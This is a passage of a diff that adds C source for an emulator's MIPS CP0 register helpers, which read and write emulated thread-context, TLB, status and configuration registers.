CP0TCSt_TCU0) + | (1 << CP0TCSt_TMX) + | (3 << CP0TCSt_TKSU) + | (0xff << CP0TCSt_TASID)); + + cu = (v >> CP0St_CU0) & 0xf; + mx = (v >> CP0St_MX) & 0x1; + ksu = (v >> CP0St_KSU) & 0x3; + asid = env->CP0_EntryHi & 0xff; + + tcstatus = cu << CP0TCSt_TCU0; + tcstatus |= mx << CP0TCSt_TMX; + tcstatus |= ksu << CP0TCSt_TKSU; + tcstatus |= asid; + + if (tc == cpu->current_tc) { + tcst = &cpu->active_tc.CP0_TCStatus; + } else { + tcst = &cpu->tcs[tc].CP0_TCStatus; + } + + *tcst &= ~mask; + *tcst |= tcstatus; + compute_hflags(cpu); +} + +/* Called for updates to CP0_TCStatus. 
*/ +static void sync_c0_tcstatus(CPUMIPSState *cpu, int tc, + target_ulong v) +{ + uint32_t status; + uint32_t tcu, tmx, tasid, tksu; + uint32_t mask = ((1U << CP0St_CU3) + | (1 << CP0St_CU2) + | (1 << CP0St_CU1) + | (1 << CP0St_CU0) + | (1 << CP0St_MX) + | (3 << CP0St_KSU)); + + tcu = (v >> CP0TCSt_TCU0) & 0xf; + tmx = (v >> CP0TCSt_TMX) & 0x1; + tasid = v & 0xff; + tksu = (v >> CP0TCSt_TKSU) & 0x3; + + status = tcu << CP0St_CU0; + status |= tmx << CP0St_MX; + status |= tksu << CP0St_KSU; + + cpu->CP0_Status &= ~mask; + cpu->CP0_Status |= status; + + /* Sync the TASID with EntryHi. */ + cpu->CP0_EntryHi &= ~0xff; + cpu->CP0_EntryHi = tasid; + + compute_hflags(cpu); +} + +/* Called for updates to CP0_EntryHi. */ +static void sync_c0_entryhi(CPUMIPSState *cpu, int tc) +{ + int32_t *tcst; + uint32_t asid, v = cpu->CP0_EntryHi; + + asid = v & 0xff; + + if (tc == cpu->current_tc) { + tcst = &cpu->active_tc.CP0_TCStatus; + } else { + tcst = &cpu->tcs[tc].CP0_TCStatus; + } + + *tcst &= ~0xff; + *tcst |= asid; +} + +/* CP0 helpers */ +target_ulong helper_mfc0_mvpcontrol(CPUMIPSState *env) +{ + return env->mvp->CP0_MVPControl; +} + +target_ulong helper_mfc0_mvpconf0(CPUMIPSState *env) +{ + return env->mvp->CP0_MVPConf0; +} + +target_ulong helper_mfc0_mvpconf1(CPUMIPSState *env) +{ + return env->mvp->CP0_MVPConf1; +} + +target_ulong helper_mfc0_random(CPUMIPSState *env) +{ + return (int32_t)cpu_mips_get_random(env); +} + +target_ulong helper_mfc0_tcstatus(CPUMIPSState *env) +{ + return env->active_tc.CP0_TCStatus; +} + +target_ulong helper_mftc0_tcstatus(CPUMIPSState *env) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + + if (other_tc == other->current_tc) + return other->active_tc.CP0_TCStatus; + else + return other->tcs[other_tc].CP0_TCStatus; +} + +target_ulong helper_mfc0_tcbind(CPUMIPSState *env) +{ + return env->active_tc.CP0_TCBind; +} + +target_ulong helper_mftc0_tcbind(CPUMIPSState 
*env) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + + if (other_tc == other->current_tc) + return other->active_tc.CP0_TCBind; + else + return other->tcs[other_tc].CP0_TCBind; +} + +target_ulong helper_mfc0_tcrestart(CPUMIPSState *env) +{ + return env->active_tc.PC; +} + +target_ulong helper_mftc0_tcrestart(CPUMIPSState *env) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + + if (other_tc == other->current_tc) + return other->active_tc.PC; + else + return other->tcs[other_tc].PC; +} + +target_ulong helper_mfc0_tchalt(CPUMIPSState *env) +{ + return env->active_tc.CP0_TCHalt; +} + +target_ulong helper_mftc0_tchalt(CPUMIPSState *env) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + + if (other_tc == other->current_tc) + return other->active_tc.CP0_TCHalt; + else + return other->tcs[other_tc].CP0_TCHalt; +} + +target_ulong helper_mfc0_tccontext(CPUMIPSState *env) +{ + return env->active_tc.CP0_TCContext; +} + +target_ulong helper_mftc0_tccontext(CPUMIPSState *env) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + + if (other_tc == other->current_tc) + return other->active_tc.CP0_TCContext; + else + return other->tcs[other_tc].CP0_TCContext; +} + +target_ulong helper_mfc0_tcschedule(CPUMIPSState *env) +{ + return env->active_tc.CP0_TCSchedule; +} + +target_ulong helper_mftc0_tcschedule(CPUMIPSState *env) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + + if (other_tc == other->current_tc) + return other->active_tc.CP0_TCSchedule; + else + return other->tcs[other_tc].CP0_TCSchedule; +} + +target_ulong helper_mfc0_tcschefback(CPUMIPSState *env) +{ + return 
env->active_tc.CP0_TCScheFBack; +} + +target_ulong helper_mftc0_tcschefback(CPUMIPSState *env) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + + if (other_tc == other->current_tc) + return other->active_tc.CP0_TCScheFBack; + else + return other->tcs[other_tc].CP0_TCScheFBack; +} + +target_ulong helper_mfc0_count(CPUMIPSState *env) +{ + return (int32_t)cpu_mips_get_count(env); +} + +target_ulong helper_mftc0_entryhi(CPUMIPSState *env) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + + return other->CP0_EntryHi; +} + +target_ulong helper_mftc0_cause(CPUMIPSState *env) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + int32_t tccause; + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + + if (other_tc == other->current_tc) { + tccause = other->CP0_Cause; + } else { + tccause = other->CP0_Cause; + } + + return tccause; +} + +target_ulong helper_mftc0_status(CPUMIPSState *env) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + + return other->CP0_Status; +} + +target_ulong helper_mfc0_lladdr(CPUMIPSState *env) +{ + return (int32_t)(env->lladdr >> env->CP0_LLAddr_shift); +} + +target_ulong helper_mfc0_watchlo(CPUMIPSState *env, uint32_t sel) +{ + return (int32_t)env->CP0_WatchLo[sel]; +} + +target_ulong helper_mfc0_watchhi(CPUMIPSState *env, uint32_t sel) +{ + return env->CP0_WatchHi[sel]; +} + +target_ulong helper_mfc0_debug(CPUMIPSState *env) +{ + target_ulong t0 = env->CP0_Debug; + if (env->hflags & MIPS_HFLAG_DM) + t0 |= 1 << CP0DB_DM; + + return t0; +} + +target_ulong helper_mftc0_debug(CPUMIPSState *env) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + int32_t tcstatus; + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + + if (other_tc == other->current_tc) + tcstatus = 
other->active_tc.CP0_Debug_tcstatus; + else + tcstatus = other->tcs[other_tc].CP0_Debug_tcstatus; + + /* XXX: Might be wrong, check with EJTAG spec. */ + return (other->CP0_Debug & ~((1 << CP0DB_SSt) | (1 << CP0DB_Halt))) | + (tcstatus & ((1 << CP0DB_SSt) | (1 << CP0DB_Halt))); +} + +#if defined(TARGET_MIPS64) +target_ulong helper_dmfc0_tcrestart(CPUMIPSState *env) +{ + return env->active_tc.PC; +} + +target_ulong helper_dmfc0_tchalt(CPUMIPSState *env) +{ + return env->active_tc.CP0_TCHalt; +} + +target_ulong helper_dmfc0_tccontext(CPUMIPSState *env) +{ + return env->active_tc.CP0_TCContext; +} + +target_ulong helper_dmfc0_tcschedule(CPUMIPSState *env) +{ + return env->active_tc.CP0_TCSchedule; +} + +target_ulong helper_dmfc0_tcschefback(CPUMIPSState *env) +{ + return env->active_tc.CP0_TCScheFBack; +} + +target_ulong helper_dmfc0_lladdr(CPUMIPSState *env) +{ + return env->lladdr >> env->CP0_LLAddr_shift; +} + +target_ulong helper_dmfc0_watchlo(CPUMIPSState *env, uint32_t sel) +{ + return env->CP0_WatchLo[sel]; +} +#endif /* TARGET_MIPS64 */ + +void helper_mtc0_index(CPUMIPSState *env, target_ulong arg1) +{ + uint32_t index_p = env->CP0_Index & 0x80000000; + uint32_t tlb_index = arg1 & 0x7fffffff; + if (tlb_index < env->tlb->nb_tlb) { + if (env->insn_flags & ISA_MIPS32R6) { + index_p |= arg1 & 0x80000000; + } + env->CP0_Index = index_p | tlb_index; + } +} + +void helper_mtc0_mvpcontrol(CPUMIPSState *env, target_ulong arg1) +{ + uint32_t mask = 0; + uint32_t newval; + + if (env->CP0_VPEConf0 & (1 << CP0VPEC0_MVP)) + mask |= (1 << CP0MVPCo_CPA) | (1 << CP0MVPCo_VPC) | + (1 << CP0MVPCo_EVP); + if (env->mvp->CP0_MVPControl & (1 << CP0MVPCo_VPC)) + mask |= (1 << CP0MVPCo_STLB); + newval = (env->mvp->CP0_MVPControl & ~mask) | (arg1 & mask); + + // TODO: Enable/disable shared TLB, enable/disable VPEs. 
+ + env->mvp->CP0_MVPControl = newval; +} + +void helper_mtc0_vpecontrol(CPUMIPSState *env, target_ulong arg1) +{ + uint32_t mask; + uint32_t newval; + + mask = (1 << CP0VPECo_YSI) | (1 << CP0VPECo_GSI) | + (1 << CP0VPECo_TE) | (0xff << CP0VPECo_TargTC); + newval = (env->CP0_VPEControl & ~mask) | (arg1 & mask); + + /* Yield scheduler intercept not implemented. */ + /* Gating storage scheduler intercept not implemented. */ + + // TODO: Enable/disable TCs. + + env->CP0_VPEControl = newval; +} + +void helper_mttc0_vpecontrol(CPUMIPSState *env, target_ulong arg1) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + uint32_t mask; + uint32_t newval; + + mask = (1 << CP0VPECo_YSI) | (1 << CP0VPECo_GSI) | + (1 << CP0VPECo_TE) | (0xff << CP0VPECo_TargTC); + newval = (other->CP0_VPEControl & ~mask) | (arg1 & mask); + + /* TODO: Enable/disable TCs. */ + + other->CP0_VPEControl = newval; +} + +target_ulong helper_mftc0_vpecontrol(CPUMIPSState *env) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + /* FIXME: Mask away return zero on read bits. */ + return other->CP0_VPEControl; +} + +target_ulong helper_mftc0_vpeconf0(CPUMIPSState *env) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + + return other->CP0_VPEConf0; +} + +void helper_mtc0_vpeconf0(CPUMIPSState *env, target_ulong arg1) +{ + uint32_t mask = 0; + uint32_t newval; + + if (env->CP0_VPEConf0 & (1 << CP0VPEC0_MVP)) { + if (env->CP0_VPEConf0 & (1 << CP0VPEC0_VPA)) + mask |= (0xff << CP0VPEC0_XTC); + mask |= (1 << CP0VPEC0_MVP) | (1 << CP0VPEC0_VPA); + } + newval = (env->CP0_VPEConf0 & ~mask) | (arg1 & mask); + + // TODO: TC exclusive handling due to ERL/EXL. 
+ + env->CP0_VPEConf0 = newval; +} + +void helper_mttc0_vpeconf0(CPUMIPSState *env, target_ulong arg1) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + uint32_t mask = 0; + uint32_t newval; + + mask |= (1 << CP0VPEC0_MVP) | (1 << CP0VPEC0_VPA); + newval = (other->CP0_VPEConf0 & ~mask) | (arg1 & mask); + + /* TODO: TC exclusive handling due to ERL/EXL. */ + other->CP0_VPEConf0 = newval; +} + +void helper_mtc0_vpeconf1(CPUMIPSState *env, target_ulong arg1) +{ + uint32_t mask = 0; + uint32_t newval; + + if (env->mvp->CP0_MVPControl & (1 << CP0MVPCo_VPC)) + mask |= (0xff << CP0VPEC1_NCX) | (0xff << CP0VPEC1_NCP2) | + (0xff << CP0VPEC1_NCP1); + newval = (env->CP0_VPEConf1 & ~mask) | (arg1 & mask); + + /* UDI not implemented. */ + /* CP2 not implemented. */ + + // TODO: Handle FPU (CP1) binding. + + env->CP0_VPEConf1 = newval; +} + +void helper_mtc0_yqmask(CPUMIPSState *env, target_ulong arg1) +{ + /* Yield qualifier inputs not implemented. 
*/ + env->CP0_YQMask = 0x00000000; +} + +void helper_mtc0_vpeopt(CPUMIPSState *env, target_ulong arg1) +{ + env->CP0_VPEOpt = arg1 & 0x0000ffff; +} + +void helper_mtc0_entrylo0(CPUMIPSState *env, target_ulong arg1) +{ + /* Large physaddr (PABITS) not implemented */ + /* 1k pages not implemented */ + target_ulong rxi = arg1 & (env->CP0_PageGrain & (3u << CP0PG_XIE)); + env->CP0_EntryLo0 = (arg1 & 0x3FFFFFFF) | (rxi << (CP0EnLo_XI - 30)); +} + +#if defined(TARGET_MIPS64) +void helper_dmtc0_entrylo0(CPUMIPSState *env, uint64_t arg1) +{ + uint64_t rxi = arg1 & ((env->CP0_PageGrain & (3ull << CP0PG_XIE)) << 32); + env->CP0_EntryLo0 = (arg1 & 0x3FFFFFFF) | rxi; +} +#endif + +void helper_mtc0_tcstatus(CPUMIPSState *env, target_ulong arg1) +{ + uint32_t mask = env->CP0_TCStatus_rw_bitmask; + uint32_t newval; + + newval = (env->active_tc.CP0_TCStatus & ~mask) | (arg1 & mask); + + env->active_tc.CP0_TCStatus = newval; + sync_c0_tcstatus(env, env->current_tc, newval); +} + +void helper_mttc0_tcstatus(CPUMIPSState *env, target_ulong arg1) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + + if (other_tc == other->current_tc) + other->active_tc.CP0_TCStatus = arg1; + else + other->tcs[other_tc].CP0_TCStatus = arg1; + sync_c0_tcstatus(other, other_tc, arg1); +} + +void helper_mtc0_tcbind(CPUMIPSState *env, target_ulong arg1) +{ + uint32_t mask = (1 << CP0TCBd_TBE); + uint32_t newval; + + if (env->mvp->CP0_MVPControl & (1 << CP0MVPCo_VPC)) + mask |= (1 << CP0TCBd_CurVPE); + newval = (env->active_tc.CP0_TCBind & ~mask) | (arg1 & mask); + env->active_tc.CP0_TCBind = newval; +} + +void helper_mttc0_tcbind(CPUMIPSState *env, target_ulong arg1) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + uint32_t mask = (1 << CP0TCBd_TBE); + uint32_t newval; + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + + if (other->mvp->CP0_MVPControl & (1 << CP0MVPCo_VPC)) + mask |= (1 << 
CP0TCBd_CurVPE); + if (other_tc == other->current_tc) { + newval = (other->active_tc.CP0_TCBind & ~mask) | (arg1 & mask); + other->active_tc.CP0_TCBind = newval; + } else { + newval = (other->tcs[other_tc].CP0_TCBind & ~mask) | (arg1 & mask); + other->tcs[other_tc].CP0_TCBind = newval; + } +} + +void helper_mtc0_tcrestart(CPUMIPSState *env, target_ulong arg1) +{ + env->active_tc.PC = arg1; + env->active_tc.CP0_TCStatus &= ~(1 << CP0TCSt_TDS); + env->lladdr = 0ULL; + /* MIPS16 not implemented. */ +} + +void helper_mttc0_tcrestart(CPUMIPSState *env, target_ulong arg1) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + + if (other_tc == other->current_tc) { + other->active_tc.PC = arg1; + other->active_tc.CP0_TCStatus &= ~(1 << CP0TCSt_TDS); + other->lladdr = 0ULL; + /* MIPS16 not implemented. */ + } else { + other->tcs[other_tc].PC = arg1; + other->tcs[other_tc].CP0_TCStatus &= ~(1 << CP0TCSt_TDS); + other->lladdr = 0ULL; + /* MIPS16 not implemented. */ + } +} + +void helper_mtc0_tchalt(CPUMIPSState *env, target_ulong arg1) +{ + MIPSCPU *cpu = mips_env_get_cpu(env); + + env->active_tc.CP0_TCHalt = arg1 & 0x1; + + // TODO: Halt TC / Restart (if allocated+active) TC. + if (env->active_tc.CP0_TCHalt & 1) { + mips_tc_sleep(cpu, env->current_tc); + } else { + mips_tc_wake(cpu, env->current_tc); + } +} + +void helper_mttc0_tchalt(CPUMIPSState *env, target_ulong arg1) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + MIPSCPU *other_cpu = mips_env_get_cpu(other); + + // TODO: Halt TC / Restart (if allocated+active) TC. 
+ + if (other_tc == other->current_tc) + other->active_tc.CP0_TCHalt = arg1; + else + other->tcs[other_tc].CP0_TCHalt = arg1; + + if (arg1 & 1) { + mips_tc_sleep(other_cpu, other_tc); + } else { + mips_tc_wake(other_cpu, other_tc); + } +} + +void helper_mtc0_tccontext(CPUMIPSState *env, target_ulong arg1) +{ + env->active_tc.CP0_TCContext = arg1; +} + +void helper_mttc0_tccontext(CPUMIPSState *env, target_ulong arg1) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + + if (other_tc == other->current_tc) + other->active_tc.CP0_TCContext = arg1; + else + other->tcs[other_tc].CP0_TCContext = arg1; +} + +void helper_mtc0_tcschedule(CPUMIPSState *env, target_ulong arg1) +{ + env->active_tc.CP0_TCSchedule = arg1; +} + +void helper_mttc0_tcschedule(CPUMIPSState *env, target_ulong arg1) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + + if (other_tc == other->current_tc) + other->active_tc.CP0_TCSchedule = arg1; + else + other->tcs[other_tc].CP0_TCSchedule = arg1; +} + +void helper_mtc0_tcschefback(CPUMIPSState *env, target_ulong arg1) +{ + env->active_tc.CP0_TCScheFBack = arg1; +} + +void helper_mttc0_tcschefback(CPUMIPSState *env, target_ulong arg1) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + + if (other_tc == other->current_tc) + other->active_tc.CP0_TCScheFBack = arg1; + else + other->tcs[other_tc].CP0_TCScheFBack = arg1; +} + +void helper_mtc0_entrylo1(CPUMIPSState *env, target_ulong arg1) +{ + /* Large physaddr (PABITS) not implemented */ + /* 1k pages not implemented */ + target_ulong rxi = arg1 & (env->CP0_PageGrain & (3u << CP0PG_XIE)); + env->CP0_EntryLo1 = (arg1 & 0x3FFFFFFF) | (rxi << (CP0EnLo_XI - 30)); +} + +#if defined(TARGET_MIPS64) +void helper_dmtc0_entrylo1(CPUMIPSState *env, uint64_t arg1) +{ + uint64_t rxi = arg1 & 
((env->CP0_PageGrain & (3ull << CP0PG_XIE)) << 32); + env->CP0_EntryLo1 = (arg1 & 0x3FFFFFFF) | rxi; +} +#endif + +void helper_mtc0_context(CPUMIPSState *env, target_ulong arg1) +{ + env->CP0_Context = (env->CP0_Context & 0x007FFFFF) | (arg1 & ~0x007FFFFF); +} + +void helper_mtc0_pagemask(CPUMIPSState *env, target_ulong arg1) +{ + uint64_t mask = arg1 >> (TARGET_PAGE_BITS + 1); + if (!(env->insn_flags & ISA_MIPS32R6) || (arg1 == ~0) || + (mask == 0x0000 || mask == 0x0003 || mask == 0x000F || + mask == 0x003F || mask == 0x00FF || mask == 0x03FF || + mask == 0x0FFF || mask == 0x3FFF || mask == 0xFFFF)) { + env->CP0_PageMask = arg1 & (0x1FFFFFFF & (((unsigned int)TARGET_PAGE_MASK) << 1)); + } +} + +void helper_mtc0_pagegrain(CPUMIPSState *env, target_ulong arg1) +{ + /* SmartMIPS not implemented */ + /* Large physaddr (PABITS) not implemented */ + /* 1k pages not implemented */ + env->CP0_PageGrain = (arg1 & env->CP0_PageGrain_rw_bitmask) | + (env->CP0_PageGrain & ~env->CP0_PageGrain_rw_bitmask); +} + +void helper_mtc0_wired(CPUMIPSState *env, target_ulong arg1) +{ + if (env->insn_flags & ISA_MIPS32R6) { + if (arg1 < env->tlb->nb_tlb) { + env->CP0_Wired = arg1; + } + } else { + env->CP0_Wired = arg1 % env->tlb->nb_tlb; + } +} + +void helper_mtc0_srsconf0(CPUMIPSState *env, target_ulong arg1) +{ + env->CP0_SRSConf0 |= arg1 & env->CP0_SRSConf0_rw_bitmask; +} + +void helper_mtc0_srsconf1(CPUMIPSState *env, target_ulong arg1) +{ + env->CP0_SRSConf1 |= arg1 & env->CP0_SRSConf1_rw_bitmask; +} + +void helper_mtc0_srsconf2(CPUMIPSState *env, target_ulong arg1) +{ + env->CP0_SRSConf2 |= arg1 & env->CP0_SRSConf2_rw_bitmask; +} + +void helper_mtc0_srsconf3(CPUMIPSState *env, target_ulong arg1) +{ + env->CP0_SRSConf3 |= arg1 & env->CP0_SRSConf3_rw_bitmask; +} + +void helper_mtc0_srsconf4(CPUMIPSState *env, target_ulong arg1) +{ + env->CP0_SRSConf4 |= arg1 & env->CP0_SRSConf4_rw_bitmask; +} + +void helper_mtc0_hwrena(CPUMIPSState *env, target_ulong arg1) +{ + uint32_t mask = 
0x0000000F; + + if (env->CP0_Config3 & (1 << CP0C3_ULRI)) { + mask |= (1 << 29); + + if (arg1 & (1 << 29)) { + env->hflags |= MIPS_HFLAG_HWRENA_ULR; + } else { + env->hflags &= ~MIPS_HFLAG_HWRENA_ULR; + } + } + + env->CP0_HWREna = arg1 & mask; +} + +void helper_mtc0_count(CPUMIPSState *env, target_ulong arg1) +{ + cpu_mips_store_count(env, arg1); +} + +void helper_mtc0_entryhi(CPUMIPSState *env, target_ulong arg1) +{ + target_ulong old, val, mask; + mask = (((unsigned int)TARGET_PAGE_MASK) << 1) | 0xFF; + if (((env->CP0_Config4 >> CP0C4_IE) & 0x3) >= 2) { + mask |= 1 << CP0EnHi_EHINV; + } + + /* 1k pages not implemented */ +#if defined(TARGET_MIPS64) + if (env->insn_flags & ISA_MIPS32R6) { + int entryhi_r = extract64(arg1, 62, 2); + int config0_at = extract32(env->CP0_Config0, 13, 2); + bool no_supervisor = (env->CP0_Status_rw_bitmask & 0x8) == 0; + if ((entryhi_r == 2) || + (entryhi_r == 1 && (no_supervisor || config0_at == 1))) { + /* skip EntryHi.R field if new value is reserved */ + mask &= ~(0x3ull << 62); + } + } + mask &= env->SEGMask; +#endif + old = env->CP0_EntryHi; + val = (arg1 & mask) | (old & ~mask); + env->CP0_EntryHi = val; + if (env->CP0_Config3 & (1 << CP0C3_MT)) { + sync_c0_entryhi(env, env->current_tc); + } + /* If the ASID changes, flush qemu's TLB. 
*/ + if ((old & 0xFF) != (val & 0xFF)) + cpu_mips_tlb_flush(env, 1); +} + +void helper_mttc0_entryhi(CPUMIPSState *env, target_ulong arg1) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + + other->CP0_EntryHi = arg1; + sync_c0_entryhi(other, other_tc); +} + +void helper_mtc0_compare(CPUMIPSState *env, target_ulong arg1) +{ + cpu_mips_store_compare(env, arg1); +} + +void helper_mtc0_status(CPUMIPSState *env, target_ulong arg1) +{ + MIPSCPU *cpu = mips_env_get_cpu(env); + uint32_t val, old; + uint32_t mask = env->CP0_Status_rw_bitmask; + + if (env->insn_flags & ISA_MIPS32R6) { + if (extract32(env->CP0_Status, CP0St_KSU, 2) == 0x3) { + mask &= ~(3 << CP0St_KSU); + } + mask &= ~(0x00180000 & arg1); + } + + val = arg1 & mask; + old = env->CP0_Status; + env->CP0_Status = (env->CP0_Status & ~mask) | val; + if (env->CP0_Config3 & (1 << CP0C3_MT)) { + sync_c0_status(env, env, env->current_tc); + } else { + compute_hflags(env); + } + + if (qemu_loglevel_mask(CPU_LOG_EXEC)) { + qemu_log("Status %08x (%08x) => %08x (%08x) Cause %08x", + old, old & env->CP0_Cause & CP0Ca_IP_mask, + val, val & env->CP0_Cause & CP0Ca_IP_mask, + env->CP0_Cause); + switch (env->hflags & MIPS_HFLAG_KSU) { + case MIPS_HFLAG_UM: qemu_log(", UM\n"); break; + case MIPS_HFLAG_SM: qemu_log(", SM\n"); break; + case MIPS_HFLAG_KM: qemu_log("\n"); break; + default: + cpu_abort(CPU(cpu), "Invalid MMU mode!\n"); + break; + } + } +} + +void helper_mttc0_status(CPUMIPSState *env, target_ulong arg1) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + + other->CP0_Status = arg1 & ~0xf1000018; + sync_c0_status(env, other, other_tc); +} + +void helper_mtc0_intctl(CPUMIPSState *env, target_ulong arg1) +{ + /* vectored interrupts not implemented, no performance counters. 
*/ + env->CP0_IntCtl = (env->CP0_IntCtl & ~0x000003e0) | (arg1 & 0x000003e0); +} + +void helper_mtc0_srsctl(CPUMIPSState *env, target_ulong arg1) +{ + uint32_t mask = (0xf << CP0SRSCtl_ESS) | (0xf << CP0SRSCtl_PSS); + env->CP0_SRSCtl = (env->CP0_SRSCtl & ~mask) | (arg1 & mask); +} + +static void mtc0_cause(CPUMIPSState *cpu, target_ulong arg1) +{ + uint32_t mask = 0x00C00300; + uint32_t old = cpu->CP0_Cause; + + if (cpu->insn_flags & ISA_MIPS32R2) { + mask |= 1 << CP0Ca_DC; + } + if (cpu->insn_flags & ISA_MIPS32R6) { + mask &= ~((1 << CP0Ca_WP) & arg1); + } + + cpu->CP0_Cause = (cpu->CP0_Cause & ~mask) | (arg1 & mask); + + if ((old ^ cpu->CP0_Cause) & (1 << CP0Ca_DC)) { + if (cpu->CP0_Cause & (1 << CP0Ca_DC)) { + cpu_mips_stop_count(cpu); + } else { + cpu_mips_start_count(cpu); + } + } + +#if 0 + int i; + /* Set/reset software interrupts */ + for (i = 0 ; i < 2 ; i++) { + if ((old ^ cpu->CP0_Cause) & (1 << (CP0Ca_IP + i))) { + cpu_mips_soft_irq(cpu, i, cpu->CP0_Cause & (1 << (CP0Ca_IP + i))); + } + } +#endif +} + +void helper_mtc0_cause(CPUMIPSState *env, target_ulong arg1) +{ + mtc0_cause(env, arg1); +} + +void helper_mttc0_cause(CPUMIPSState *env, target_ulong arg1) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + + mtc0_cause(other, arg1); +} + +target_ulong helper_mftc0_epc(CPUMIPSState *env) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + + return other->CP0_EPC; +} + +target_ulong helper_mftc0_ebase(CPUMIPSState *env) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + + return other->CP0_EBase; +} + +void helper_mtc0_ebase(CPUMIPSState *env, target_ulong arg1) +{ + /* vectored interrupts not implemented */ + env->CP0_EBase = (env->CP0_EBase & ~0x3FFFF000) | (arg1 & 0x3FFFF000); +} + +void helper_mttc0_ebase(CPUMIPSState *env, 
target_ulong arg1) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + other->CP0_EBase = (other->CP0_EBase & ~0x3FFFF000) | (arg1 & 0x3FFFF000); +} + +target_ulong helper_mftc0_configx(CPUMIPSState *env, target_ulong idx) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + + switch (idx) { + case 0: return other->CP0_Config0; + case 1: return other->CP0_Config1; + case 2: return other->CP0_Config2; + case 3: return other->CP0_Config3; + /* 4 and 5 are reserved. */ + case 6: return other->CP0_Config6; + case 7: return other->CP0_Config7; + default: + break; + } + return 0; +} + +void helper_mtc0_config0(CPUMIPSState *env, target_ulong arg1) +{ + env->CP0_Config0 = (env->CP0_Config0 & 0x81FFFFF8) | (arg1 & 0x00000007); +} + +void helper_mtc0_config2(CPUMIPSState *env, target_ulong arg1) +{ + /* tertiary/secondary caches not implemented */ + env->CP0_Config2 = (env->CP0_Config2 & 0x8FFF0FFF); +} + +void helper_mtc0_config4(CPUMIPSState *env, target_ulong arg1) +{ + env->CP0_Config4 = (env->CP0_Config4 & (~env->CP0_Config4_rw_bitmask)) | + (arg1 & env->CP0_Config4_rw_bitmask); +} + +void helper_mtc0_config5(CPUMIPSState *env, target_ulong arg1) +{ + env->CP0_Config5 = (env->CP0_Config5 & (~env->CP0_Config5_rw_bitmask)) | + (arg1 & env->CP0_Config5_rw_bitmask); + compute_hflags(env); +} + +void helper_mtc0_lladdr(CPUMIPSState *env, target_ulong arg1) +{ + target_long mask = env->CP0_LLAddr_rw_bitmask; + arg1 = arg1 << env->CP0_LLAddr_shift; + env->lladdr = (env->lladdr & ~mask) | (arg1 & mask); +} + +void helper_mtc0_watchlo(CPUMIPSState *env, target_ulong arg1, uint32_t sel) +{ + /* Watch exceptions for instructions, data loads, data stores + not implemented. 
